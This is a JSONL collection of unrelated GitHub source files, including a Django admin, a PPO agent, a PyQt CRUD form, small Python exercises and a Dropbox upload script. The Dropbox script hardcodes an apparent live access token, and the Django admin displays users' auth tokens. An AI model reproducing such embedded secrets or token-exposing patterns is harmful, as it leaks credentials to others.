ULAO04(master=tk.Tk()).mainloop()\n","repo_name":"GMUSatCom/GMU-Thermal-Vac","sub_path":"examples/ui/ULAO04.py","file_name":"ULAO04.py","file_ext":"py","file_size_in_byte":11094,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"}
+{"seq_id":"17663169814","text":"import zipfile\n\nfrom django.contrib import admin\nfrom django.core import serializers\nfrom django.http import HttpResponse\nimport io\nfrom auth_and_perms import models\n\n@admin.action(description='Export Laboratory')\ndef export_rol_perms(admin, request, queryset):\n buffer = io.BytesIO()\n zip_file = zipfile.ZipFile(buffer, 'w')\n\n\n for rol in queryset:\n rols=models.ProfilePermission.objects.filter(rol=rol)\n zip_file.writestr(rol.name+\".json\", serializers.serialize('json', rols))\n zip_file.close()\n buffer.seek(0)\n response = HttpResponse(buffer.getvalue(),\n content_type='application/x-zip-compressed',\n headers={'Content-Disposition': 'attachment; filename=\"permissionsrol.zip\"'})\n return response\n\n\nclass RolAdmin(admin.ModelAdmin):\n filter_horizontal = ['permissions']\n actions = [export_rol_perms]\n\n\nclass AuthorizedApplicationAdmin(admin.ModelAdmin):\n list_display = ['name', 'auth_token']\n\n @admin.display(empty_value='unknown')\n def auth_token(self, obj):\n if obj.user:\n return obj.user.auth_token.key\n return 'unknown'\n\n\nadmin.site.register(models.AuthorizedApplication, AuthorizedApplicationAdmin)\nadmin.site.register(models.Profile)\nadmin.site.register(models.Rol, RolAdmin)\nadmin.site.register(models.ProfilePermission)","repo_name":"Solvosoft/organilab","sub_path":"src/auth_and_perms/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"}
+{"seq_id":"31155615417","text":"from biicode.server.model.block import Block\nfrom biicode.common.exception import (ForbiddenException, PublishException, NotFoundException,\n ServerInternalErrorException, NotInStoreException,\n BiiRequestErrorException, BiiServiceException,\n AlreadyInStoreException)\nfrom biicode.server.exception import DuplicateBlockException\nfrom biicode.common.utils.bii_logging import logger\nimport traceback\nfrom biicode.server.authorize import Security\nfrom biicode.common.model.block_info import BlockInfo\nfrom biicode.common.model.symbolic.block_version import BlockVersion\nfrom biicode.common.model.version_tag import DEV\n\n\nclass PublishService(object):\n ''' Service for publish blocks in server.'''\n def __init__(self, store, auth_user):\n self._store = store\n self.auth_user = auth_user\n self.security = Security(self.auth_user, self._store)\n\n def publish(self, publish_request):\n '''Performs a publication\n TIP: If we add publish_request to transaction_definition we can easily have asynchronous\n publications\n\n private: Only for first publication\n '''\n from biicode.server.background.enqueuer import register_publish\n\n if publish_request.tag == DEV:\n if not publish_request:\n raise BiiRequestErrorException('Up to date, nothing to publish')\n if publish_request.versiontag is not None:\n raise PublishException('A DEV version cannot have tag %s' % publish_request.tag)\n\n assert publish_request.deptable is not None\n\n # by default it is public\n # TODO: BLock creation is not handled in the transaction\n target_version = publish_request.parent\n user = self._store.read_user(target_version.block.owner)\n # Look if user has the block already created, because the block\n # can exist with -1 version if it has been created in web\n if target_version.block not in user.blocks.keys():\n try:\n if target_version != publish_request.parent: # Branching\n user = self.create_block(target_version.block,\n publish_request.parent, private=False)\n else:\n user = self.create_block(target_version.block, private=False)\n except DuplicateBlockException:\n pass # Its ok, already created\n\n target_block = target_version.block\n self._store.requestBlockTransaction(target_block)\n try:\n # If we can't read the block, we can't know about his existence\n self.security.check_read_block(target_block)\n self.security.check_publish_block(target_block, publish_request)\n # biiresponse.debug('Read block \"%s\"' % brl_block)\n block = self._store.read_block(target_block)\n (cells, contents,\n old_cells_ids, old_content_ids) = self._in_memory_block_update(block, publish_request)\n except ForbiddenException:\n self._store.finishBlockTransaction(target_block)\n raise\n except PublishException as e:\n self._store.finishBlockTransaction(target_block)\n raise ServerInternalErrorException(e.message)\n except Exception as excp:\n logger.error(\"Exception in publish service!!: %s \" % str(excp))\n tb = traceback.format_exc()\n logger.error(tb)\n self._store.finishBlockTransaction(target_block)\n raise ServerInternalErrorException()\n\n self._store.beginBlockTransaction(target_block, cells, contents)\n try:\n self._write_resources_to_db(cells, contents, old_cells_ids, old_content_ids)\n self._store.update_block(block)\n self._store.commitBlockTransaction(target_block)\n register_publish(self.auth_user, block.last_version())\n self._store.finishBlockTransaction(target_block)\n\n # Need to read user again, otherwise will raise MongoNotCurrentObjectException\n # because of double update of same memory object\n user = self._store.read_user(target_version.block.owner)\n user.add_block_size_bytes(target_version.block, publish_request.bytes)\n # Save user (with block bytes updated)\n self._store.update_user(user)\n\n return block.last_version()\n\n except Exception as excp:\n tb = traceback.format_exc()\n logger.debug(tb)\n self._rollback_transaction(excp, target_block)\n raise ServerInternalErrorException('Publish transaction failed. Please, retry')\n\n def create_block(self, brl, private=False):\n '''Creates a block in server due the brl and description'''\n self.security.check_create_block(brl.owner, private)\n user = self._store.read_user(brl.owner)\n try:\n block_id = user.add_block(brl) # should fail if existing\n except DuplicateBlockException:\n logger.debug('Block %s already existing, not creating it' % brl)\n raise\n\n block = Block(block_id, brl)\n try: # FIXME: better upsert?\n self._store.create_block(block, private) # should fail if existing\n except AlreadyInStoreException:\n pass\n self._store.update_user(user) # raise exception if not current\n\n return user\n\n def _rollback_transaction(self, excp, brl_block):\n '''rollback transaction for publish'''\n logger.warning(str(excp) + '\\nRolling back publish transaction')\n self._store.rollBackBlockTransaction(brl_block)\n self._store.finishBlockTransaction(brl_block)\n\n def _write_resources_to_db(self, cells, contents, old_cells_ids, old_content_ids):\n '''Write cells and contents to db'''\n if old_cells_ids:\n self._store.delete_published_cells(old_cells_ids)\n if old_content_ids:\n self._store.delete_published_contents(old_content_ids)\n if cells:\n self._store.create_published_cells(cells)\n if contents:\n self._store.create_published_contents(contents)\n\n # @mongo_update_if_current_safe_retry\n # def __update_user_if_current(self, user):\n def _set_cell_roots(self, block, publish_request):\n '''Set cell root'''\n # Ensure here root assignment\n old_ids = {}\n deltas = block.deltas\n last_time = len(deltas) - 2\n\n for res in publish_request.cells:\n old_name = publish_request.renames.get_old_name(res.name.cell_name)\n old_id = block.cells.get_id(old_name, last_time)\n if old_id:\n old_ids[old_id] = res\n else:\n res.root = res.ID\n old_cells = self._store.read_published_cells(old_ids.keys())\n for old_id, old_cell in old_cells.iteritems():\n res = old_ids[old_id]\n res.root = old_cell.root\n\n def _in_memory_block_update(self, block, publish_request):\n '''Updates block in memory'''\n self.security.check_write_block(block.ID)\n cells, contents, old_cells_ids, old_content_ids = block.add_publication(publish_request,\n self.auth_user)\n self._set_cell_roots(block, publish_request)\n return cells, contents, old_cells_ids, old_content_ids\n\n def get_block_info(self, brl_block):\n '''Check if auth_user can publish a block version specified by parameter block_version\n Returns:\n BlockInfo\n '''\n\n try:\n self.security.check_read_block(brl_block)\n except NotInStoreException:\n # In this case, the block doesnt exist, but return information of -1 and permissions\n return self._get_new_block_info(brl_block)\n\n block_info = BlockInfo()\n try:\n self.security.check_write_block(brl_block)\n block_info.can_write = True\n except ForbiddenException:\n block_info.can_write = False\n\n try:\n block = self._store.read_block(brl_block)\n block_info.last_version = block.last_version()\n block_info.private = self.security.is_private(brl_block)\n except Exception as e:\n tb = traceback.format_exc()\n logger.debug(tb)\n logger.error(\"Something went wrong with %s\" % e)\n raise BiiServiceException('Something went wrong')\n\n return block_info\n\n def _get_new_block_info(self, brl_block):\n '''\n Returns BlockInfo that new block would have if we publish it.\n Raises exception if block cannot be created for any reason\n '''\n last_version = BlockVersion(brl_block, -1)\n can_write = False\n try:\n self.security.check_create_block(brl_block.owner)\n can_write = True\n except ForbiddenException:\n can_write = False\n except NotInStoreException:\n raise NotFoundException(\"Block %s not found!\" % brl_block.to_pretty())\n\n return BlockInfo(can_write=can_write, last_version=last_version)\n","repo_name":"biicode/bii-server","sub_path":"publish/publish_service.py","file_name":"publish_service.py","file_ext":"py","file_size_in_byte":9257,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"19"}
+{"seq_id":"16942244441","text":"name = input('Type your name:')\nprint('Welcome',name,'to this adventure!')\n\nanswer = input ('You are on dirt road, it has come to an end and you can go left or right. Which way would you like to go?').lower()#Makes all the letters small for the program.\n\nif answer == 'left':\n answer = input(\"You come to a river, you can walk around it or swim across, walk or swim?\")\n\n if answer == \"swim\":\n print(\"You swam across and were eaten by an alligator.\")\n\n elif answer == \"walk\":\n print(\"You walked for many miles, ran out of water and lost the game\")\n \n\n else:\n print(\"Not a valid option. You lose.\")\n\n \n \nelif answer == \"right\":\n print (\"Not a valid option. You lose.\")\n","repo_name":"Baller321/Small-python-projects","sub_path":"choose_your_own_adventure.py","file_name":"choose_your_own_adventure.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"28616212212","text":"# coding: latin-1\r\n__author__ = 'waldo'\r\nfrom gui import MdiWidget, CRUDWidget\r\nfrom ventanas import Ui_vtnCliente\r\nfrom validarDatos import ValidarDatos\r\nfrom baseDatos import Cliente as ClienteModel\r\nfrom baseDatos import Remito as RemitoModel\r\nfrom PyQt4 import QtGui\r\nclass Cliente(CRUDWidget, Ui_vtnCliente):\r\n \"\"\"\r\n Lógica del ABM de clientes.\r\n \"\"\"\r\n def __init__(self, mdi):\r\n \"\"\"\r\n Constructor de la clase Cliente.\r\n :param mdi:\r\n :return:\r\n \"\"\"\r\n MdiWidget.__init__(self, mdi)\r\n self.sesion = self.mdi().window().getSesionBD()\r\n self.validadores(ClienteModel)\r\n\r\n def cargarClientes(self):\r\n \"\"\"\r\n Carga los datos de los clientes en las tablas de las ventanas (Baja y Modificación).\r\n :return:\r\n \"\"\"\r\n self.cargarObjetos(self.tableClientes,\r\n ClienteModel.buscarTodos(\"dni\", self.sesion).all(),\r\n (\"dni\", \"nombre\", \"apellido\", \"direccion\", \"telefono\")\r\n )\r\n\r\n def crear(self):\r\n \"\"\"\r\n Da de alta un cliente nuevo y lo almacena en la base de datos.\r\n :return:\r\n \"\"\"\r\n if ValidarDatos.validarCamposVacios(self.camposRequeridos):\r\n cliente = ClienteModel(str(self.lineDni.text()), str(self.lineNombre.text()),\r\n str(self.lineApellido.text()), str(self.lineDireccion.text()),\r\n str(self.lineTelefono.text()))\r\n if cliente.guardar(self.sesion):\r\n self.showMsjEstado(\"El Cliente fue dado de alta.\")\r\n self.limpiarCampos()\r\n self.objectCreated.emit()\r\n else:\r\n cliente = ClienteModel.buscar(ClienteModel.dni, self.sesion,\r\n str(self.lineDni.text())).first()\r\n if cliente.getBaja():\r\n cliente.setBaja(False)\r\n cliente.modificar(self.sesion)\r\n self.showMsjEstado(\"El Cliente fue dado de alta.\")\r\n self.limpiarCampos()\r\n self.objectCreated.emit()\r\n else:\r\n QtGui.QMessageBox.critical(self, 'Error', 'El Cliente ya existe.', 'Aceptar')\r\n else:\r\n self.showMsjEstado(\"Hay datos obligatorios que no fueron completados.\")\r\n\r\n def eliminar(self):\r\n \"\"\"\r\n Da de baja el cliente selecionado.\r\n :return:\r\n \"\"\"\r\n itemActual=self.tableClientes.currentItem()\r\n if itemActual==None:\r\n self.showMsjEstado(\"No se ha seleccionado ningun Cliente de la tabla\")\r\n else:\r\n row = itemActual.row()\r\n dni = str(self.tableClientes.item(row, 0).text())\r\n if self.bajaValida(dni):\r\n query = ClienteModel.buscarAlta(ClienteModel.dni, self.sesion, dni)\r\n for instance in query.all():\r\n self.cliente = instance\r\n self.cliente.borrar(self.sesion)\r\n self.showMsjEstado(\"El Cliente ha sido dado de baja\")\r\n self.tableClientes.removeRow(row)\r\n self.objectDeleted.emit()\r\n self.actualizar()\r\n else:\r\n QtGui.QMessageBox.critical(self, 'Error', 'Existen remitos pendientes de pago para dicho '\r\n 'Cliente.', 'Aceptar')\r\n\r\n def modificar(self):\r\n \"\"\"\r\n Modifica los datos del cliente seleccionado.\r\n :return:\r\n \"\"\"\r\n itemActual=self.tableClientes.currentItem()\r\n if itemActual!=None:\r\n if ValidarDatos.validarCamposVacios(self.camposRequeridos):\r\n row = itemActual.row()\r\n dni = str(self.tableClientes.item(row, 0).text())\r\n query = ClienteModel.buscarAlta(ClienteModel.dni, self.sesion, dni)\r\n for instance in query.all():\r\n self.cliente = instance\r\n self.cliente.setNombre(str(self.lineNombre.text()))\r\n self.cliente.setApellido(str(self.lineApellido.text()))\r\n self.cliente.setDireccion(str(self.lineDireccion.text()))\r\n self.cliente.setTelefono(str(self.lineTelefono.text()))\r\n self.cliente.modificar(self.sesion)\r\n self.showMsjEstado(\"El cliente fue modificado\")\r\n self.objectModified.emit()\r\n self.actualizar()\r\n else:\r\n self.showMsjEstado(\"Hay datos obligatorios que no fueron completados.\")\r\n else:\r\n self.showMsjEstado(\"No se ha seleccionado un Cliente de la tabla\")\r\n\r\n def bajaValida(self, dni):\r\n \"\"\"\r\n Verifica que el cliente no posea remitos sin pagar.\r\n :param dni: DNI del cliente para el cual se realiza la verificación.\r\n :return: bool\r\n \"\"\"\r\n remito = RemitoModel.buscarAlta(RemitoModel.cliente, self.sesion, dni).all()\r\n for r in remito:\r\n if r.getCobrado() == None:\r\n return False\r\n return True\r\n\r\n def cargarCamposBaja(self):\r\n \"\"\"\r\n Carga los campos con los datos del cliente seleccionado (Baja).\r\n :return:\r\n \"\"\"\r\n self.lineNombre.setEnabled(False)\r\n self.lineApellido.setEnabled(False)\r\n self.cargarCamposMod()\r\n\r\n def buscar(self):\r\n \"\"\"\r\n Busca al cliente de acuerdo a la información ingresada y carga los datos en la tabla (Baja y Modificaión).\r\n :return:\r\n \"\"\"\r\n obj = self.sender().objectName()\r\n if obj == 'lineDni':\r\n clientes = ClienteModel.buscarAlta(ClienteModel.dni, self.sesion, str(self.lineDni.text())).all()\r\n elif obj == 'lineNombre':\r\n clientes = ClienteModel.buscarLike(ClienteModel.nombre, self.sesion,\r\n str(self.lineNombre.text())).all()\r\n elif obj == 'lineApellido':\r\n clientes = ClienteModel.buscarLike(ClienteModel.apellido, self.sesion,\r\n str(self.lineApellido.text())).all()\r\n elif obj == 'btnBuscar':\r\n if str(self.lineDni.text()) != \"\":\r\n clientes = ClienteModel.buscarAlta(ClienteModel.dni, self.sesion, str(self.lineDni.text())).all()\r\n elif str(self.lineNombre.text()) != \"\":\r\n clientes = ClienteModel.buscarLike(ClienteModel.nombre, self.sesion,\r\n str(self.lineNombre.text())).all()\r\n elif str(self.lineApellido.text()) != \"\":\r\n clientes = ClienteModel.buscarLike(ClienteModel.apellido, self.sesion,\r\n str(self.lineApellido.text())).all()\r\n else:\r\n self.showMsjEstado(\"Ingrese DNI, Nombre o Apellido del Cliente para realizar la\"\r\n \" busqueda.\")\r\n return\r\n self.limpiarTabla(self.tableClientes)\r\n self.cargarObjetos(self.tableClientes, clientes,\r\n (\"dni\", \"nombre\", \"apellido\", \"direccion\", \"telefono\")\r\n )\r\n\r\n def actualizar(self):\r\n \"\"\"\r\n Actualiza los componentes de las ventanas.\r\n :return:\r\n \"\"\"\r\n self.limpiarCampos()\r\n self.limpiarTabla(self.tableClientes)\r\n self.cargarClientes()\r\n\r\n def limpiarCampos(self):\r\n \"\"\"\r\n Vacia los campos de la ventana.\r\n :return:\r\n \"\"\"\r\n self.lineDni.clear()\r\n self.lineDni.setEnabled(True)\r\n self.lineNombre.clear()\r\n self.lineNombre.setEnabled(True)\r\n self.lineApellido.clear()\r\n self.lineApellido.setEnabled(True)\r\n self.lineDireccion.clear()\r\n self.lineTelefono.clear()\r\n self.tableClientes.setCurrentItem(None)\r\n\r\n def cargarCamposMod(self):\r\n \"\"\"\r\n Carga los campos con los datos del cliente seleccionado (Modificación).\r\n :return:\r\n \"\"\"\r\n self.lineDni.setEnabled(False)\r\n row=self.tableClientes.currentItem().row()\r\n infoItem=[]\r\n for col in range(0,self.tableClientes.columnCount()):\r\n infoItem.append(self.tableClientes.item(row,col).text())\r\n #Cargar la info del item en los lines\r\n self.lineDni.setText(infoItem[0])\r\n self.lineNombre.setText(infoItem[1])\r\n self.lineApellido.setText(infoItem[2])\r\n self.lineDireccion.setText(infoItem[3])\r\n self.lineTelefono.setText(infoItem[4])\r\n\r\n @classmethod\r\n def create(cls, mdi):\r\n \"\"\"\r\n Configuración de la ventana Alta Cliente.\r\n :param mdi: referencia a la ventana Alta Cliente.\r\n :return: gui\r\n \"\"\"\r\n gui = super(Cliente, cls).create(mdi)\r\n gui.groupBuscar.hide()\r\n gui.btnBuscar.hide()\r\n gui.btnAceptar.pressed.connect(gui.crear)\r\n gui.btnCancelar.pressed.connect(gui.limpiarCampos)\r\n return gui\r\n\r\n @classmethod\r\n def delete(cls, mdi):\r\n \"\"\"\r\n Configuración de la ventana Baja Cliente.\r\n :param mdi: referencia a la ventana Baja Cliente.\r\n :return: gui\r\n \"\"\"\r\n gui = super(Cliente, cls).delete(mdi)\r\n gui.lineDireccion.setEnabled(False)\r\n gui.lineTelefono.setEnabled(False)\r\n gui.lineDni.returnPressed.connect(gui.buscar)\r\n gui.lineNombre.returnPressed.connect(gui.buscar)\r\n gui.lineApellido.returnPressed.connect(gui.buscar)\r\n gui.cargarClientes()\r\n gui.btnAceptar.pressed.connect(gui.eliminar)\r\n gui.btnCancelar.pressed.connect(gui.actualizar)\r\n gui.btnBuscar.pressed.connect(gui.buscar)\r\n gui.tableClientes.itemClicked.connect(gui.cargarCamposBaja)\r\n return gui\r\n\r\n @classmethod\r\n def update(cls, mdi):\r\n \"\"\"\r\n Configuración de la ventana Modificación Cliente.\r\n :param mdi: referencia a la ventana Modificación Cliente.\r\n :return: gui\r\n \"\"\"\r\n gui = super(Cliente, cls).update(mdi)\r\n gui.cargarClientes()\r\n gui.tableClientes.itemClicked.connect(gui.cargarCamposMod)\r\n gui.lineDni.returnPressed.connect(gui.buscar)\r\n gui.lineNombre.returnPressed.connect(gui.buscar)\r\n gui.lineApellido.returnPressed.connect(gui.buscar)\r\n gui.btnAceptar.pressed.connect(gui.modificar)\r\n gui.btnCancelar.pressed.connect(gui.actualizar)\r\n gui.btnBuscar.pressed.connect(gui.buscar)\r\n return gui\r\n\r\n","repo_name":"UNPSJB/FarmaciaCrisol","sub_path":"gestionClientes/lgClientes.py","file_name":"lgClientes.py","file_ext":"py","file_size_in_byte":10526,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"5164916032","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.distributions import Normal\nfrom Network import Actor, Critic\n\nclass PPO:\n def __init__(self,\n s_dim=3,\n a_dim=1,\n bound=2,\n actor_lr=1e-4,\n critic_lr=2e-4,\n update_step_a=10,\n update_step_c=10,\n gamma=0.9,\n epsilon=0.2):\n # Parameter initialization\n self.s_dim = s_dim\n self.a_dim = a_dim\n self.bound = bound\n self.actor_lr = actor_lr\n self.critic_lr = critic_lr\n self.update_step_a = update_step_a\n self.update_step_c = update_step_c\n self.gamma = gamma\n self.epsilon = epsilon\n\n # network initialization\n self.actor = Actor(s_dim, a_dim, bound)\n self.actor_old = Actor(s_dim, a_dim, bound)\n self.actor_old.load_state_dict(self.actor.state_dict())\n self.actor_opt = torch.optim.Adam(self.actor.parameters(), lr=self.actor_lr)\n self.critic = Critic(s_dim)\n self.critic_opt = torch.optim.Adam(self.critic.parameters(), lr=self.critic_lr)\n\n # memory initialization\n self.memory_s, self.memory_a, self.memory_r = [], [], []\n\n def get_action(self, s):\n # select action w.r.t the actions prob\n s = torch.FloatTensor(s)\n mu, sigma = self.actor(s)\n dist = Normal(loc=mu, scale=sigma)\n a = dist.sample()\n a = torch.clamp(a, -self.bound, self.bound)\n return a.item()\n\n def get_v(self, s):\n # the state value\n s = torch.FloatTensor(s)\n with torch.no_grad():\n v = self.critic(s)\n return v.item()\n\n def calculate_log_prob(self, s, a, old=False):\n # s.shape = [batch, s_dim], a.shape = [batch, a_dim]\n # mu.shape = sigma.shape = log_prob.shape = [batch, a_dim]\n if old:\n with torch.no_grad():\n mu, sigma = self.actor_old(s)\n else:\n mu, sigma = self.actor(s)\n dist = Normal(loc=mu, scale=sigma)\n log_prob = dist.log_prob(a)\n return log_prob\n\n def learn(self, s, a, s_, r, done):\n # store transition\n self.memory_s.append(s)\n self.memory_a.append(a)\n self.memory_r.append(r)\n if done:\n # calculate the discounted reward\n discounted_r = []\n v_ = self.get_v(s_)\n for t in range(len(self.memory_r) - 1, -1, -1):\n v_ = self.memory_r[t] + self.gamma * v_\n discounted_r.insert(0, v_)\n s = torch.FloatTensor(self.memory_s)\n a = torch.FloatTensor(self.memory_a).unsqueeze(dim=-1)\n r = torch.FloatTensor(discounted_r).unsqueeze(dim=-1)\n # start to update network\n self.actor_old.load_state_dict(self.actor.state_dict())\n old_log_prob = self.calculate_log_prob(s, a, old=True)\n with torch.no_grad():\n advantage = r - self.critic(s)\n for _ in range(self.update_step_a):\n self.update_actor(s, a, advantage, old_log_prob)\n for _ in range(self.update_step_c):\n self.update_critic(s, r)\n # empty the memory\n self.memory_s, self.memory_a, self.memory_r = [], [], []\n\n def update_actor(self, s, a, advantage, old_log_prob):\n # calculate the loss\n log_prob = self.calculate_log_prob(s, a)\n ratio = torch.exp(log_prob - old_log_prob)\n surr1 = ratio*advantage\n surr2 = torch.clamp(ratio, 1.0 - self.epsilon,\n 1.0 + self.epsilon) * advantage\n loss = -torch.mean(torch.min(surr1, surr2))\n # update\n self.actor_opt.zero_grad()\n loss.backward()\n self.actor_opt.step()\n\n def update_critic(self, s, r):\n # calculate critic loss\n v = self.critic(s)\n advantage = r - v\n loss = torch.mean(advantage**2)\n # update\n self.critic_opt.zero_grad()\n loss.backward()\n self.critic_opt.step()","repo_name":"Parisfal/DRL-Pytorch-Tutorial","sub_path":"4.1 PPO1/Agent.py","file_name":"Agent.py","file_ext":"py","file_size_in_byte":4125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"}
+{"seq_id":"70486599404","text":"import os \nimport csv \nimport time\nimport pandas as pd \nimport numpy as np \n\"\"\"\ndesc1: 数据清洗脚本\ndesc: 数据去重,选取具有代表性的pio_type,原始数据是从数据库中直接拉去下来的数据,同类型的数据出现频率太高\n 这个脚本的作用是清洗数据,选择部分数据作为训练集或者测试集\ndemand: 数据是csv格式的文件,最好在csv文件中已经去重\n\"\"\"\ndef load_data():\n # 设置读取文件路径和存储文件路径\n file_path = \"\"\n result_path = \"\"\n if os.path.exists(file_path) and os.path.exists(result_path):\n print(\"file exist, the process can continue\")\n else:\n print(\"file not exist\")\n return\n raw_file = pd.read_csv(file_path, engine=\"python\")\n result_file = open(result_path, mode='a', newline='')\n\n # 交互性命令行设置,方便设置抽取参数sampel_num\n m, n = raw_file.shape\n result_writer = csv.writer(result_file)\n sampel_num = input(\"how many data do you want extract from the origin file :\")\n if sampel_num == None:\n print(\"we set a default number for you, number is 10000\")\n sampel_num = 10000\n sampel_num = int(sampel_num)\n if sampel_num >= m:\n print(\"invalid number\")\n keyIn = input(\"make sure you have define how many data do you want, continue(yes/no?)\")\n if keyIn != \"yes\":\n return\n print(\"the process start working\")\n \n # 核心代码,进行数据数据\n begin_time = time.clock()\n print(0, raw_file.loc[0][1])\n print(1, raw_file.loc[1][1])\n for i in range(m):\n # k = raw_file.loc[i][1]\n # print(k, type(k))\n # 注意这里raw_file.loc[i][1]的type是str类型,只比较字符串的第一个字符来判断是否选取这个样本\n if i >= sampel_num:\n break\n if i == 0 or raw_file.loc[i][1][0] != raw_file.loc[i-1][1][0]:\n # print(raw_file.loc[i][1])\n kk = raw_file.loc[i][1]\n print(kk)\n result_writer.writerow([kk])\n print(\"data storing...\")\n result_file.close()\n end_time = time.clock()\n print(\"time consuming of the process:\", end_time-begin_time, \"s\")\n\ndef main():\n load_data()\n\nif __name__ == \"__main__\":\n main()","repo_name":"dddfgkl/csvAndExcel","sub_path":"csvAnalyse/extract_data.py","file_name":"extract_data.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"39581575050","text":"# Regex без использования Google Search (Hors Arev :D)\nimport re\npattern = '^([0-9a-zA-Z_\\.-]+)\\@([0-9a-zA-Z_\\.-]+)\\.([ru | com | io | net | ai]{2,6})$'\nstring = 'example@mail.ru'\npattern2 = '^([0-9a-zA-Z]{4})\\:([0-9a-zA-Z]{4})\\:([0-9a-zA-Z]{4})\\:([0-9a-zA-Z]{4})$'\nstring2 = '2001:0DB8:AC10:FE01'\nresult = re.findall(pattern, string)\nresult2 = re.findall(pattern2, string2)\nif len(result) > 0:\n\tif len(result[0]) == 3:\n\t\tprint('Valid E-mail :)')\n\telse:\n\t\tprint('No Valid E-mail :)')\nelse:\n\tprint('No Valid E-mail :)')\nif len(result2) > 0:\n\tif len(result2[0]) == 4:\n\t\tprint('Valid IPV6 :)')\n\telse:\n\t\tprint('No Valid IPV6 :)')\nelse:\n\tprint('No Valid IPV6 :)')","repo_name":"wizardcapone/Basic-IT-Center-Python","sub_path":"Regex/regex.py","file_name":"regex.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"45587018713","text":"from typing import Optional\nfrom core.db import Transactional\nfrom sqlalchemy import select, and_\n\nfrom core.db import session\nfrom core.utils import LanguageManager\nfrom ..models import ProductTax\nclass ProductTaxService:\n def __init__(self):\n ...\n\n @Transactional()\n async def create_product_tax(\n self,\n product_id: int,\n tax_id: int,\n tax: float,\n tax_type: str,\n ) -> str:\n pass\n \n async def delete(\n self,\n ids: list,\n flag: str,\n accept_language: Optional[str],\n language_manager: LanguageManager,\n ) -> dict:\n print (\"~~~~~~~~~~~~~~~~~~~~~~~ product taxes delete request\")\n result = await session.execute(\n select(ProductTax).where(ProductTax.product_id.in_(ids))\n )\n product_taxes = result.scalars().all()\n if not product_taxes:\n print (\"Product taxes not found\")\n else:\n for product_tax in product_taxes:\n await session.delete(product_tax)\n if flag!=\"direct\":\n await session.commit()\n print (\"product taxes delete success\")\n return { \"success\": True, \"message\": language_manager.get_message(accept_language=accept_language, key=\"product_taxes_deleted\") }","repo_name":"techguru0/easyric-api-beta","sub_path":"app/product_tax/services/product_tax.py","file_name":"product_tax.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"21816704671","text":"import dropbox\r\n\r\nclass TransferData:\r\n def __init__(self, access_token):\r\n self.access_token = access_token\r\n \r\n def upload_file(self, file_from, file_to):\r\n \r\n dbx = dropbox.Dropbox(self.access_token)\r\n f = open(file_from, 'rb')\r\n print(f.read())\r\n\r\n dbx.files_upload(f.read(), file_to)\r\n\r\ndef main():\r\n access_token = 'sl.AwiGhdO02RNNjBWV_7XBYnfLPrYQYjk-VWmvgWv_rWplLZfEVTfrFm_5Z5XYpb9mw37j19wJjeXgHUVPVQRi-4tOm43ZyC-lSxw6SbCGjKy3mbzQMwG4No3nY331OCZvEj7c5Ww'\r\n transferData = TransferData(access_token)\r\n\r\n file_from = input(\"Enter the file path to transfer: \")\r\n file_to = input(\"Enter the full path to upload to dropbox: \")\r\n transferData.upload_file(file_from, file_to)\r\n\r\nmain()","repo_name":"WhiteHatJr-stud/cloudStorageErrorCode","sub_path":"cloudStorage.py","file_name":"cloudStorage.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"73463530924","text":"# 임의의 N개 숫자가 입력으로 주어집니다. N개의 수를 오름찾순으로 정렬한 다음 N개의 수중\n# 한 개의 수인 M이 주어지면 이분검색으로 M이 정렬된 상태에서 몇 번째에 있는지 구하는 프로그램을 작성하세요\n\nimport sys\n# sys.stdin = open(\"in1.txt\", \"rt\")\nn, k = map(int, input().split())\n\n\nlist1 = list(map(int, input().split()))\n\n# print(list1)\nlist1.sort()\n# print(list1)\n\n\n\nlt = 0\nrt = n\nwhile lt <= rt:\n mid = (rt + lt) // 2\n if list1[mid] == k:\n print(mid+1)\n break;\n elif list1[mid] > k:\n rt = mid - 1\n else:\n lt = mid + 1","repo_name":"genizara/python_algorithm","sub_path":"inflearn01/섹션 4/1. 이분검색/AA.py","file_name":"AA.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"39065686757","text":"#Functions can Accept Arguments\n#Put the argument's name between the parentheses.\ndef search4vowels(word):\n \"\"\"Display any vowels found in an asked-for word.\"\"\"\n vowels = set('aeiou')\n #This line isn't needed anymore.\n #word = input('Provide a word to search for vowels: ')\n#The call to the \"input\" function is gone(as we don't need that line of code anymore).\n\n found = vowels.intersection(set(word))\n for vowel in found:\n print(vowel)\n\nsearch4vowels('amitpratapsingh')\n","repo_name":"AmitAps/python","sub_path":"headfirstpy/ch4/functakearg.py","file_name":"functakearg.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
